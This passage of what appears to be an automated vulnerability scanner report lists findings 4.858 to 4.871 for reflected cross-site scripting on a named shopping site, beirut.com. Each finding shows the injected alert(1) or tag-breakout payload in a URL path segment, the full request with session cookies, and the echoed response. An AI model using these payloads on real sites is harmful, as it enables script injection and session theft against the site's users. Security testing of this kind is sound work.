<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Clothing-Accessories/194367784/Swimwear/53f1880'-alert(1)-'4070e905925';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.858. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Watches/36 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Watches/36

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37919'-alert(1)-'80e318a2088 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping37919'-alert(1)-'80e318a2088/Clothing-Accessories/194367784/Watches/36 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:00:42 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60513

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping37919'-alert(1)-'80e318a2088/Clothing-Accessories/194367784/Watches/36';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.859. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Watches/36 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Watches/36

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de16f"><a>ff06d6c3af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shoppingde16f"><a>ff06d6c3af/Clothing-Accessories/194367784/Watches/36 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:52:49 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59940

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shoppingde16f"><a>ff06d6c3af">
...[SNIP]...

4.860. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Watches/36 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Watches/36

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 645bf<script>alert(1)</script>5adbf37b053 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Clothing-Accessories645bf<script>alert(1)</script>5adbf37b053/194367784/Watches/36 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:06:23 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Clothing Accessories645bf<script>alert(1)</script>5adbf37b053 <a href="#" id="backlink">
...[SNIP]...

4.861. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Watches/36 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Watches/36

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33beb'-alert(1)-'ddafe0f695f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories33beb'-alert(1)-'ddafe0f695f/194367784/Watches/36 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:05:39 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Clothing-Accessories33beb'-alert(1)-'ddafe0f695f/194367784/Watches/36';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.862. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Watches/36 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Watches/36

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef829'-alert(1)-'65615c2a724 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/194367784ef829'-alert(1)-'65615c2a724/Watches/36 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:13:52 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Clothing-Accessories/194367784ef829'-alert(1)-'65615c2a724/Watches/36';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.863. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Watches/36 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Watches/36

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 408e4'-alert(1)-'f97b254136f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/194367784/Watches408e4'-alert(1)-'f97b254136f/36 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:19:25 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Clothing-Accessories/194367784/Watches408e4'-alert(1)-'f97b254136f/36';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.864. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Watches/36 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Watches/36

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8debd'-alert(1)-'e4d134f74fe was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/194367784/Watches/368debd'-alert(1)-'e4d134f74fe HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:24:12 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Clothing-Accessories/194367784/Watches/368debd'-alert(1)-'e4d134f74fe';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.865. http://www.beirut.com/Shopping/Consumer-Goods/235690923 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d65a3'-alert(1)-'daf630a9340 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shoppingd65a3'-alert(1)-'daf630a9340/Consumer-Goods/235690923 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:44:35 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shoppingd65a3'-alert(1)-'daf630a9340/Consumer-Goods';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.866. http://www.beirut.com/Shopping/Consumer-Goods/235690923 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2df7e"><a>fa8cbfdc028 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping2df7e"><a>fa8cbfdc028/Consumer-Goods/235690923 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:37:48 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping2df7e"><a>fa8cbfdc028">
...[SNIP]...

4.867. http://www.beirut.com/Shopping/Consumer-Goods/235690923 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f749c<script>alert(1)</script>1603827485f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Consumer-Goodsf749c<script>alert(1)</script>1603827485f/235690923 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:48:31 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Consumer Goodsf749c<script>alert(1)</script>1603827485f <a href="#" id="backlink">
...[SNIP]...

4.868. http://www.beirut.com/Shopping/Consumer-Goods/235690923 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9709'-alert(1)-'dc2afc07940 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goodsd9709'-alert(1)-'dc2afc07940/235690923 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:48:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61186

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Consumer-Goodsd9709'-alert(1)-'dc2afc07940';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.869. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Flowers/17 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Flowers/17

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4de26"><a>34b6c8001fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping4de26"><a>34b6c8001fc/Consumer-Goods/235690923/Flowers/17 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:05:21 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60185

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping4de26"><a>34b6c8001fc">
...[SNIP]...

4.870. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Flowers/17 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Flowers/17

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cf57'-alert(1)-'e69a37a240c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping1cf57'-alert(1)-'e69a37a240c/Consumer-Goods/235690923/Flowers/17 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:17:00 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping1cf57'-alert(1)-'e69a37a240c/Consumer-Goods/235690923/Flowers/17';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.871. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Flowers/17 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Flowers/17

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a81a'-alert(1)-'1956de7bef2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goods7a81a'-alert(1)-'1956de7bef2/235690923/Flowers/17 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
